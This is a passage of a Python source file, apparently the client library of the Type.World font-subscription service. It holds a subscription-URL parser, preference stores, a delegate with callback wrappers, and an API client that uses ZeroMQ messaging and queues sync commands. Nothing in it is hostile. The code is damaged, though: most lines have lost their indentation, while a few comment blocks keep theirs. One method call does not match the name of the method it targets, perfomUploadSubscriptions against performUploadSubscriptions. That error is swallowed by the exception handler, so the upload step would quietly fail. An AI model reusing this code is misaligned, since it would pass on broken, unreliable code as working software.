# # Thus, we're routing all internal traffic directly to flask via its
# # test_client():
# try:
# import main
# GAE = True
# except ImportError:
# GAE = False
# if GAE and ("api.type.world" in url or "typeworld2.appspot.com" in url):
# if "api.type.world" in url:
# url = url.split("api.type.world")[-1]
# elif "typeworld2.appspot.com" in url:
# url = url.split("typeworld2.appspot.com")[-1]
# with main.app.test_client() as c:
# if method == "POST":
# response = c.post(url, data=parameters)
# return True, response.data, None
# elif method == "GET":
# response = c.get(url)
# return True, response.data, None
# if method == "POST":
# response = requests.post(url, parameters, timeout=timeout)
# elif method == "GET":
# response = requests.get(url, timeout=timeout)
# except Exception:
# if parameters:
# parameters = copy.copy(parameters)
# for key in parameters:
# if key.lower().endswith("key"):
# parameters[key] = "*****"
# if key.lower().endswith("secret"):
# parameters[key] = "*****"
# message = (
# f"Response from {url} with parameters {parameters} after {i+1} tries: "
# + traceback.format_exc().splitlines()[-1]
# )
# else:
# message = traceback.format_exc().splitlines()[-1]
# return False, message, None
# else:
# # try:
# if response.status_code != 200:
# return False, f"HTTP Error {response.status_code}", response
# else:
# return True, response.content, response
def splitJSONURL(url):
customProtocol = "typeworld://"
url = url.replace(customProtocol, "")
protocol = url.split("+")[0]
url = url.replace(protocol + "+", "")
url = url.replace("http//", "http://")
url = url.replace("https//", "https://")
url = url.replace("HTTP//", "http://")
url = url.replace("HTTPS//", "https://")
transportProtocol = None
if url.startswith("https://"):
transportProtocol = "https://"
elif url.startswith("http://"):
transportProtocol = "http://"
urlRest = url[len(transportProtocol) :]
subscriptionID = ""
secretKey = ""
accessToken = ""
# With credentials
if "@" in urlRest:
credentials, domain = urlRest.split("@")
credentialParts = credentials.split(":")
if len(credentialParts) == 3:
subscriptionID, secretKey, accessToken = credentialParts
elif len(credentialParts) == 2:
subscriptionID, secretKey = credentialParts
elif len(credentialParts) == 1:
subscriptionID = credentialParts[0]
# No credentials given
else:
domain = urlRest
return (
customProtocol,
protocol,
transportProtocol,
subscriptionID,
secretKey,
accessToken,
domain,
)
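# Worked example (illustrative): splitJSONURL() decomposes
# "typeworld://json+https//sub:key@example.com/api/" into
# ("typeworld://", "json", "https://", "sub", "key", "", "example.com/api/"),
# i.e. custom protocol, API protocol, transport protocol, subscription ID,
# secret key, access token (empty here) and REST domain.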
class Preferences(object):
def __init__(self):
self._dict = {} # nocoverage
# (In tests, preferences are loaded either as JSON or as AppKitNSUserDefaults,
# not the plain class here)
def get(self, key):
if key in self._dict:
return self._dict[key]
def set(self, key, value):
self._dict[key] = value
self.save()
def remove(self, key):
if key in self._dict:
del self._dict[key]
self.save()
def save(self):
pass
def dictionary(self):
return self._dict # nocoverage
# (In tests, preferences are loaded either as JSON or as AppKitNSUserDefaults,
# not the plain class here)
class JSON(Preferences):
def __init__(self, path):
self.path = path
self._dict = {}
if self.path and os.path.exists(self.path):
self._dict = json.loads(ReadFromFile(self.path))
def save(self):
if not os.path.exists(os.path.dirname(self.path)):
os.makedirs(os.path.dirname(self.path))
WriteToFile(self.path, json.dumps(self._dict))
def dictionary(self):
return self._dict
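# Usage sketch for the JSON preferences store (illustrative; the path is
# hypothetical): every set()/remove() immediately serialises the whole dict
# back to disk via save().
def _example_json_preferences():
    import tempfile
    prefs = JSON(os.path.join(tempfile.mkdtemp(), "preferences.json"))
    prefs.set("lastUpdate", "2017-01-01")
    return prefs.get("lastUpdate")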
class AppKitNSUserDefaults(Preferences):
def __init__(self, name):
# NSUserDefaults = objc.lookUpClass('NSUserDefaults')
self.defaults = NSUserDefaults.alloc().initWithSuiteName_(name)
self.values = {}
def get(self, key):
if key in self.values:
return self.values[key]
else:
o = self.defaults.objectForKey_(key)
if o:
if "Array" in o.__class__.__name__:
o = list(o)
elif "Dictionary" in o.__class__.__name__:
o = dict(o)
elif "unicode" in o.__class__.__name__:
o = str(o)
self.values[key] = o
return self.values[key]
def set(self, key, value):
# self.defaults.setObject_forKey_(json.dumps(value), key)
# if MAC:
# if type(value) == dict:
# value = NSDictionary.alloc().initWithDictionary_(value)
self.values[key] = value
self.defaults.setObject_forKey_(value, key)
def remove(self, key):
if key in self.values:
del self.values[key]
if self.defaults.objectForKey_(key):
self.defaults.removeObjectForKey_(key)
def convertItem(self, item):
if "Array" in item.__class__.__name__ or type(item) in (list, tuple):
_list = list(item)
for i, _item in enumerate(_list):
_list[i] = self.convertItem(_item)
return _list
elif "Dictionary" in item.__class__.__name__ or type(item) == dict:
d = dict(item)
for k, v in d.items():
d[k] = self.convertItem(v)
return d
elif "unicode" in item.__class__.__name__:
return str(item)
def dictionary(self):
d = self.defaults.dictionaryRepresentation()
return self.convertItem(d)
class TypeWorldClientDelegate(object):
def __init__(self):
self.client = None
self.initialize()
def initialize(self):
pass
def _fontWillInstall(self, font):
try:
self.fontWillInstall(font)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def fontWillInstall(self, font):
assert type(font) == typeworld.api.Font
def _fontHasInstalled(self, success, message, font):
try:
self.fontHasInstalled(success, message, font)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def fontHasInstalled(self, success, message, font):
if success:
assert type(font) == typeworld.api.Font
def _fontWillUninstall(self, font):
try:
self.fontWillUninstall(font)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def fontWillUninstall(self, font):
assert type(font) == typeworld.api.Font
def _fontHasUninstalled(self, success, message, font):
try:
self.fontHasUninstalled(success, message, font)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def fontHasUninstalled(self, success, message, font):
if success:
assert type(font) == typeworld.api.Font
def _subscriptionUpdateNotificationHasBeenReceived(self, subscription):
try:
self.subscriptionUpdateNotificationHasBeenReceived(subscription)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
    def subscriptionUpdateNotificationHasBeenReceived(self, subscription):
        assert type(subscription) == typeworld.client.APISubscription
# def _subscriptionInvitationHasBeenReceived(self, invitation):
# try:
# self.subscriptionInvitationHasBeenReceived(invitation)
# except Exception: # nocoverage
# self.client.handleTraceback( # nocoverage
# sourceMethod=getattr(self, sys._getframe().f_code.co_name)
# )
# def subscriptionInvitationHasBeenReceived(self, invitation):
# pass
def _userAccountUpdateNotificationHasBeenReceived(self):
try:
self.userAccountUpdateNotificationHasBeenReceived()
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def userAccountUpdateNotificationHasBeenReceived(self):
pass
def _userAccountHasBeenUpdated(self):
try:
self.userAccountHasBeenUpdated()
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def userAccountHasBeenUpdated(self):
pass
def _userAccountIsReloading(self):
try:
self.userAccountIsReloading()
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def userAccountIsReloading(self):
pass
def _userAccountHasReloaded(self):
try:
self.userAccountHasReloaded()
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def userAccountHasReloaded(self):
pass
def _subscriptionWillDelete(self, subscription):
try:
self.subscriptionWillDelete(subscription)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def subscriptionWillDelete(self, subscription):
pass
def _subscriptionHasBeenDeleted(self, subscription, withinPublisherDeletion=False, remotely=False):
try:
self.subscriptionHasBeenDeleted(subscription, withinPublisherDeletion, remotely)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def subscriptionHasBeenDeleted(self, subscription, withinPublisherDeletion, remotely):
pass
def _publisherWillDelete(self, publisher):
try:
self.publisherWillDelete(publisher)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def publisherWillDelete(self, publisher):
pass
def _publisherHasBeenDeleted(self, publisher):
try:
self.publisherHasBeenDeleted(publisher)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def publisherHasBeenDeleted(self, publisher):
pass
def _subscriptionHasBeenAdded(self, subscription, remotely=False):
try:
self.subscriptionHasBeenAdded(subscription, remotely)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def subscriptionHasBeenAdded(self, subscription, remotely):
pass
def _subscriptionWillUpdate(self, subscription):
try:
self.subscriptionWillUpdate(subscription)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def subscriptionWillUpdate(self, subscription):
pass
def _subscriptionHasBeenUpdated(self, subscription, success, message, changes):
try:
self.subscriptionHasBeenUpdated(subscription, success, message, changes)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def subscriptionHasBeenUpdated(self, subscription, success, message, changes):
pass
def _clientPreferenceChanged(self, key, value):
try:
self.clientPreferenceChanged(key, value)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def clientPreferenceChanged(self, key, value):
pass
def _messageQueueConnected(self):
try:
self.messageQueueConnected()
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def messageQueueConnected(self):
pass
def _messageQueueError(self, status=None):
try:
self.messageQueueError(status=status)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def messageQueueError(self, status=None):
pass
def _messageQueueLostConnection(self):
try:
self.messageQueueLostConnection()
self.client.zmqRestart()
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def messageQueueLostConnection(self):
pass
def _messageQueueDisconnected(self):
try:
self.messageQueueDisconnected()
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def messageQueueDisconnected(self):
pass
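    # A minimal delegate sketch: subclass and override only the callbacks you
    # need. The underscore-prefixed wrappers above route exceptions to
    # APIClient.handleTraceback(), so a faulty delegate can't crash the client:
    #
    #     class MyDelegate(TypeWorldClientDelegate):
    #         def fontHasInstalled(self, success, message, font):
    #             if success:
    #                 print("Installed font:", font)
    #
    #     client = APIClient(delegate=MyDelegate())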
class APIInvitation(object):
keywords = ()
def __init__(self, d):
for key in self.keywords:
# if key in d:
setattr(self, key, d[key])
# else:
# setattr(self, key, None)
class APIPendingInvitation(APIInvitation):
keywords = (
"url",
"ID",
"invitedByUserName",
"invitedByUserEmail",
"time",
"canonicalURL",
"publisherName",
"subscriptionName",
"logoURL",
"backgroundColor",
"fonts",
"families",
"foundries",
"websiteURL",
)
def accept(self):
return self.parent.acceptInvitation(self.url)
def decline(self):
return self.parent.declineInvitation(self.url)
class APIAcceptedInvitation(APIInvitation):
keywords = (
"url",
"ID",
"invitedByUserName",
"invitedByUserEmail",
"time",
"canonicalURL",
"publisherName",
"subscriptionName",
"logoURL",
"backgroundColor",
"fonts",
"families",
"foundries",
"websiteURL",
)
class APISentInvitation(APIInvitation):
keywords = (
"url",
"invitedUserName",
"invitedUserEmail",
"invitedTime",
"acceptedTime",
"confirmed",
)
class APIClient(object):
"""\
Main Type.World client app object.
Use it to load repositories and install/uninstall fonts.
"""
def __init__(
self,
preferences=None,
secretTypeWorldAPIKey=None,
delegate=None,
mothership=None,
mode="headless",
zmqSubscriptions=False,
online=False,
testing=False,
externallyControlled=False,
secretServerAuthKey=None,
inCompiledApp=False,
commercial=False,
appID="world.type.headless",
):
try:
self._preferences = preferences or Preferences()
# if self:
# self.clearPendingOnlineCommands()
self._publishers = {}
self._subscriptionsUpdated = []
self.onlineCommandsQueue = []
self._syncProblems = []
self.secretTypeWorldAPIKey = secretTypeWorldAPIKey
self.delegate = delegate or TypeWorldClientDelegate()
self.delegate.client = self
self.mothership = mothership or MOTHERSHIP
self.mode = mode # gui or headless
self.zmqSubscriptions = zmqSubscriptions
self._isSetOnline = online
self.lastOnlineCheck = {}
self.testing = testing
self.externallyControlled = externallyControlled
self.secretServerAuthKey = secretServerAuthKey
self.inCompiledApp = inCompiledApp
self.commercial = commercial
self.appID = appID
self._zmqRunning = False
self._zmqCallbacks = {}
self._zmqStatus = None
self.sslcontext = ssl.create_default_context(cafile=certifi.where())
# For Unit Testing
self.testScenario = None
self._systemLocale = None
self._online = {}
# wentOnline()
if self._isSetOnline and not self.externallyControlled:
self.wentOnline()
# ZMQ
if self._isSetOnline and self.zmqSubscriptions:
if self.user():
topicID = "user-%s" % self.user()
self.registerZMQCallback(topicID, self.zmqCallback)
self.manageMessageQueueConnection()
#
# Version-dependent startup procedures
#
# 0.2.10 or newer
if semver.VersionInfo.parse(typeworld.api.VERSION).compare("0.2.10-beta") >= 0:
# Delete all resources
for publisher in self.publishers():
for subscription in publisher.subscriptions():
subscription.remove("resources")
self.remove("resources")
except Exception as e: # nocoverage
self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def __repr__(self):
return f'<APIClient user="{self.user()}">'
def tracebackTest(self):
try:
assert abc # noqa: F821
except Exception as e:
self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e)
def tracebackTest2(self):
try:
assert abc # noqa: F821
except Exception:
self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name))
    def wentOnline(self):
        success, message = self.downloadSettings(performCommands=True)
        assert success
        assert self.get("downloadedSettings")["messagingQueue"].startswith("tcp://")
        assert self.get("downloadedSettings")["breakingAPIVersions"]
def wentOffline(self):
pass
def zmqRestart(self):
self.zmqQuit()
self.wentOnline()
self.zmqSetup()
self.reRegisterZMQCallbacks()
def zmqSetup(self):
import zmq
import zmq.error
if not self._zmqRunning:
self._zmqctx = zmq.Context.instance()
self.zmqSocket = self._zmqctx.socket(zmq.SUB)
# https://github.com/zeromq/libzmq/issues/2882
self.zmqSocket.setsockopt(zmq.TCP_KEEPALIVE, 1)
self.zmqSocket.setsockopt(zmq.TCP_KEEPALIVE_CNT, 10)
self.zmqSocket.setsockopt(zmq.TCP_KEEPALIVE_IDLE, 30)
self.zmqSocket.setsockopt(zmq.TCP_KEEPALIVE_INTVL, 30)
target = self.get("downloadedSettings")["messagingQueue"]
self.zmqSocket.connect(target)
self._zmqRunning = True
self.zmqListenerThread = threading.Thread(target=self.zmqListener, daemon=True)
self.zmqListenerThread.start()
# MONITOR
self._zmqMonitor = self.zmqSocket.get_monitor_socket()
self.zmqMonitorThread = threading.Thread(
target=self.event_monitor,
args=(self._zmqMonitor,),
daemon=True,
)
self.zmqMonitorThread.start()
def event_monitor(self, monitor):
import zmq
from zmq.utils.monitor import recv_monitor_message
import zmq.error
EVENT_MAP = {}
for name in dir(zmq):
if name.startswith("EVENT_"):
value = getattr(zmq, name)
# print("%21s : %4i" % (name, value))
EVENT_MAP[value] = name
# Store these events:
error = [
"EVENT_CLOSED",
"EVENT_CONNECT_RETRIED",
"EVENT_CONNECT_DELAYED",
]
lostConnection = [
"EVENT_DISCONNECTED",
"EVENT_CLOSED",
]
connected = ["EVENT_HANDSHAKE_SUCCEEDED"]
try:
while monitor.poll():
evt = recv_monitor_message(monitor)
status = EVENT_MAP[evt["event"]]
if status in error:
self.delegate._messageQueueError(status=status)
if status in lostConnection:
zmqRestartThread = threading.Thread(target=self.delegate._messageQueueLostConnection, daemon=True)
zmqRestartThread.start()
# self.delegate._messageQueueLostConnection()
if status in connected:
self.delegate._messageQueueConnected()
evt.update({"description": status})
# print("Event: {}".format(evt))
if evt["event"] == zmq.EVENT_MONITOR_STOPPED:
break
except zmq.error.ZMQError:
pass
monitor.close()
# print("event monitor thread done!")
def zmqListener(self):
import zmq
import zmq.error
while self._zmqRunning:
time.sleep(0.1)
try:
topic, msg = self.zmqSocket.recv_multipart(flags=zmq.NOBLOCK)
topic = topic.decode()
msg = msg.decode()
if topic in self._zmqCallbacks:
self._zmqCallbacks[topic](msg)
except zmq.Again:
pass
except zmq.error.ZMQError:
pass
def quit(self):
self.zmqQuit()
def zmqQuit(self):
if self._zmqRunning:
# for topic in self._zmqCallbacks:
# self.zmqSocket.setsockopt(zmq.UNSUBSCRIBE, topic.encode("ascii"))
self._zmqRunning = False
self._zmqMonitor.close()
self.zmqSocket.close()
self._zmqctx.destroy()
self.zmqListenerThread.join()
self.zmqMonitorThread.join()
# self._zmqctx.term()
self.delegate._messageQueueDisconnected()
def reRegisterZMQCallbacks(self):
import zmq
import zmq.error
if self.zmqSubscriptions:
for topic in self._zmqCallbacks:
self.zmqSocket.setsockopt(zmq.SUBSCRIBE, topic.encode("ascii"))
def registerZMQCallback(self, topic, method):
import zmq
import zmq.error
if self.zmqSubscriptions:
if self._zmqRunning and not self.zmqSocket.closed:
self.zmqSocket.setsockopt(zmq.SUBSCRIBE, topic.encode("ascii"))
self._zmqCallbacks[topic] = method
def unregisterZMQCallback(self, topic):
import zmq
import zmq.error
if self.zmqSubscriptions:
if topic in self._zmqCallbacks:
if self._zmqRunning and not self.zmqSocket.closed:
self.zmqSocket.setsockopt(zmq.UNSUBSCRIBE, topic.encode("ascii"))
del self._zmqCallbacks[topic]
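    # A minimal sketch of the callback API above; the topic string follows the
    # "user-<anonymousUserID>" pattern used in __init__ and performLinkUser():
    #
    #     def onMessage(message):
    #         print("ZMQ message:", message)
    #
    #     client.registerZMQCallback("user-%s" % client.user(), onMessage)
    #     ...
    #     client.unregisterZMQCallback("user-%s" % client.user())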
def zmqCallback(self, message):
try:
if message:
data = json.loads(message)
if data["command"] == "pullUpdates" and (
"sourceAnonymousAppID" not in data
or (
"sourceAnonymousAppID" in data
and data["sourceAnonymousAppID"]
and data["sourceAnonymousAppID"] != self.anonymousAppID()
)
):
self.delegate._userAccountUpdateNotificationHasBeenReceived()
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
# def clearPendingOnlineCommands(self):
# commands = self.get('pendingOnlineCommands') or {}
# commands['acceptInvitation'] = []
# commands['declineInvitation'] = []
# commands['downloadSubscriptions'] = []
# commands['linkUser'] = []
# commands['syncSubscriptions'] = []
# commands['unlinkUser'] = []
# commands['uploadSubscriptions'] = []
# self.set('pendingOnlineCommands', commands)
    def holdsSubscriptionWithLiveNotifications(self):
for publisher in self.publishers():
for subscription in publisher.subscriptions():
success, command = subscription.protocol.endpointCommand()
if success:
if command.sendsLiveNotifications:
return True
return False
def requiresMessageQueueConnection(self):
return (
(self.user() and self.get("userAccountStatus") == "pro")
            or self.holdsSubscriptionWithLiveNotifications()
or self.testing
# or self.testScenario == "simulateProAccount"
)
def manageMessageQueueConnection(self):
import zmq
import zmq.error
if self._isSetOnline and self.zmqSubscriptions:
requiresMessageQueueConnection = self.requiresMessageQueueConnection()
if requiresMessageQueueConnection and not self._zmqRunning:
self.zmqSetup()
for topic in self._zmqCallbacks:
self.zmqSocket.setsockopt(zmq.SUBSCRIBE, topic.encode("ascii"))
elif not requiresMessageQueueConnection and self._zmqRunning:
self.zmqQuit()
def get(self, key):
try:
return self._preferences.get("world.type.guiapp." + key) or self._preferences.get(key)
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def set(self, key, value):
try:
self._preferences.set("world.type.guiapp." + key, value)
self.delegate._clientPreferenceChanged(key, value)
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def remove(self, key):
try:
self._preferences.remove("world.type.guiapp." + key)
self._preferences.remove(key)
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def performRequest(self, url, parameters={}, method="POST"):
try:
parameters["sourceAnonymousAppID"] = self.anonymousAppID()
parameters["clientVersion"] = typeworld.api.VERSION
if self.testScenario == "simulateFaultyClientVersion":
parameters["clientVersion"] = "abc"
elif self.testScenario == "simulateNoClientVersion":
del parameters["clientVersion"]
if self.testing:
parameters["testing"] = "true"
# if self._isSetOnline:
if self.testScenario:
parameters["testScenario"] = self.testScenario
if self.testScenario == "simulateCentralServerNotReachable":
url = "https://api.type.worlddd/api"
return request(url, parameters, method)
# else:
# return False, 'APIClient is set to work offline as set by:
# APIClient(online=False)'
except Exception as e: # nocoverage
success, message = self.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
return success, message, None
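    # performRequest() relays the 3-tuple of the module-level request() helper:
    # (success, responseContentOrErrorMessage, responseObject). Typical call site:
    #
    #     success, response, responseObject = self.performRequest(
    #         self.mothership + "/downloadSettings", {"anonymousUserID": self.user()}
    #     )
    #     if success:
    #         response = json.loads(response)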
def pendingInvitations(self):
try:
_list = []
if self.get("pendingInvitations"):
for invitation in self.get("pendingInvitations"):
invitation = APIPendingInvitation(invitation)
invitation.parent = self
_list.append(invitation)
return _list
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def acceptedInvitations(self):
try:
_list = []
if self.get("acceptedInvitations"):
for invitation in self.get("acceptedInvitations"):
invitation = APIAcceptedInvitation(invitation)
invitation.parent = self
_list.append(invitation)
return _list
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def sentInvitations(self):
try:
_list = []
if self.get("sentInvitations"):
for invitation in self.get("sentInvitations"):
invitation = APISentInvitation(invitation)
invitation.parent = self
_list.append(invitation)
return _list
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def secretSubscriptionURLs(self):
try:
_list = []
for publisher in self.publishers():
for subscription in publisher.subscriptions():
_list.append(subscription.protocol.secretURL())
return _list
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def unsecretSubscriptionURLs(self):
try:
_list = []
for publisher in self.publishers():
for subscription in publisher.subscriptions():
_list.append(subscription.protocol.unsecretURL())
return _list
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def timezone(self):
try:
return strftime("%z", gmtime())
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def syncProblems(self):
return self._syncProblems
def addMachineIDToParameters(self, parameters):
try:
(
machineModelIdentifier,
machineHumanReadableName,
machineSpecsDescription,
) = MachineName()
if machineModelIdentifier:
parameters["machineModelIdentifier"] = machineModelIdentifier
if machineHumanReadableName:
parameters["machineHumanReadableName"] = machineHumanReadableName
if machineSpecsDescription:
parameters["machineSpecsDescription"] = machineSpecsDescription
import platform
parameters["machineNodeName"] = platform.node()
osName = OSName()
if osName:
parameters["machineOSVersion"] = osName
return parameters
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def online(self, server=None):
try:
if self.testScenario == "simulateNotOnline":
return False
if "GAE_DEPLOYMENT_ID" in os.environ:
return True # nocoverage
if not server:
server = "type.world"
if not server.startswith("http"):
server = "http://" + server
if server in self.lastOnlineCheck and type(self.lastOnlineCheck[server]) is float:
if time.time() - self.lastOnlineCheck[server] < 10:
return True
if server.startswith("http://"):
server = server[7:]
elif server.startswith("https://"):
server = server[8:]
# try:
# urllib.request.urlopen(server, context=self.sslcontext) # Python 3.x
# except urllib.error.URLError:
# return False
conn = httplib.HTTPConnection(server, timeout=5)
try:
conn.request("HEAD", "/")
conn.close()
# return True
            except Exception:
conn.close()
return False
# try:
# urllib2.urlopen(server, timeout=1)
# except urllib2.URLError as err:
# return False
# Do nothing if HTTP errors are returned, and let the subsequent methods
# handle the details
# except urllib.error.HTTPError:
# pass
self.lastOnlineCheck[server] = time.time()
return True
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def appendCommands(self, commandName, commandsList=["pending"]):
try:
# Set up data structure
commands = self.get("pendingOnlineCommands")
if not self.get("pendingOnlineCommands"):
commands = {}
# Init empty
if commandName not in commands:
commands[commandName] = []
if (
commandName in commands and len(commands[commandName]) == 0
): # set anyway if empty because NSObject immutability
commands[commandName] = []
self.set("pendingOnlineCommands", commands)
# Add commands to list
commands = self.get("pendingOnlineCommands")
if type(commandsList) in (str, int):
commandsList = [commandsList]
for commandListItem in commandsList:
if commandListItem not in commands[commandName]:
commands[commandName] = list(commands[commandName])
commands[commandName].append(commandListItem)
self.set("pendingOnlineCommands", commands)
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
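    # The queue persisted under "pendingOnlineCommands" is a plain dict mapping
    # command names to argument lists, e.g. (values hypothetical):
    #
    #     {
    #         "linkUser": ["<anonymousUserID>"],
    #         "syncSubscriptions": ["pending"],
    #         "downloadSubscriptions": [],
    #     }
    #
    # performCommands() below drains this queue whenever the client is online.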
def performCommands(self):
log = False
if log:
print()
print("performCommands()")
# for line in traceback.format_stack():
# print(line.strip())
try:
success, message = True, None
self._syncProblems = []
if self.online():
self.delegate._userAccountIsReloading()
commands = self.get("pendingOnlineCommands") or {}
# unlinkUser
if "unlinkUser" in commands and commands["unlinkUser"]:
success, message = self.performUnlinkUser()
if log:
print("unlinkUser")
if success:
commands["unlinkUser"] = []
self.set("pendingOnlineCommands", commands)
else:
self._syncProblems.append(message)
# linkUser
if "linkUser" in commands and commands["linkUser"]:
success, message = self.performLinkUser(commands["linkUser"][0])
if log:
print("linkUser")
if success:
commands["linkUser"] = []
self.set("pendingOnlineCommands", commands)
else:
self._syncProblems.append(message)
# syncSubscriptions
if "syncSubscriptions" in commands and commands["syncSubscriptions"]:
success, message = self.performSyncSubscriptions(commands["syncSubscriptions"])
if log:
print("syncSubscriptions")
if success:
commands["syncSubscriptions"] = []
self.set("pendingOnlineCommands", commands)
else:
self._syncProblems.append(message)
# uploadSubscriptions
if "uploadSubscriptions" in commands and commands["uploadSubscriptions"]:
success, message = self.perfomUploadSubscriptions(commands["uploadSubscriptions"])
if log:
print("uploadSubscriptions")
if success:
commands["uploadSubscriptions"] = []
self.set("pendingOnlineCommands", commands)
else:
self._syncProblems.append(message)
# acceptInvitation
if "acceptInvitation" in commands and commands["acceptInvitation"]:
success, message = self.performAcceptInvitation(commands["acceptInvitation"])
if log:
print("acceptInvitation")
if success:
commands["acceptInvitation"] = []
self.set("pendingOnlineCommands", commands)
else:
self._syncProblems.append(message)
# declineInvitation
if "declineInvitation" in commands and commands["declineInvitation"]:
success, message = self.performDeclineInvitation(commands["declineInvitation"])
if log:
print("declineInvitation")
if success:
commands["declineInvitation"] = []
self.set("pendingOnlineCommands", commands)
else:
self._syncProblems.append(message)
# downloadSubscriptions
if "downloadSubscriptions" in commands and commands["downloadSubscriptions"]:
success, message = self.performDownloadSubscriptions()
if log:
print("downloadSubscriptions")
if success:
commands["downloadSubscriptions"] = []
self.set("pendingOnlineCommands", commands)
else:
self._syncProblems.append(message)
# downloadSettings
if "downloadSettings" in commands and commands["downloadSettings"]:
success, message = self.performDownloadSettings()
if log:
print("downloadSettings")
if success:
commands["downloadSettings"] = []
self.set("pendingOnlineCommands", commands)
else:
self._syncProblems.append(message)
self.delegate._userAccountHasReloaded()
if self._syncProblems:
return False, self._syncProblems[0]
else:
return True, None
else:
self.delegate._userAccountHasReloaded()
self._syncProblems.append("#(response.notOnline)")
return (
False,
["#(response.notOnline)", "#(response.notOnline.headline)"],
)
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def uploadSubscriptions(self, performCommands=True):
try:
self.appendCommands("uploadSubscriptions", self.secretSubscriptionURLs() or ["empty"])
# self.appendCommands("downloadSubscriptions")
success, message = True, None
if performCommands:
success, message = self.performCommands()
return success, message
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
    def performUploadSubscriptions(self, oldURLs):
try:
userID = self.user()
if userID:
if oldURLs == ["pending"]:
oldURLs = ["empty"]
self.set("lastServerSync", int(time.time()))
# self.log('Uploading subscriptions: %s' % oldURLs)
parameters = {
"anonymousAppID": self.anonymousAppID(),
"anonymousUserID": userID,
"subscriptionURLs": ",".join(oldURLs),
"secretKey": self.secretKey(),
}
success, response, headers = self.performRequest(
self.mothership + "/uploadUserSubscriptions", parameters
)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
# Success
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def downloadSubscriptions(self, performCommands=True):
try:
if self.user():
self.appendCommands("downloadSubscriptions")
if performCommands:
return self.performCommands()
else:
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def performDownloadSubscriptions(self):
try:
userID = self.user()
if userID:
parameters = {
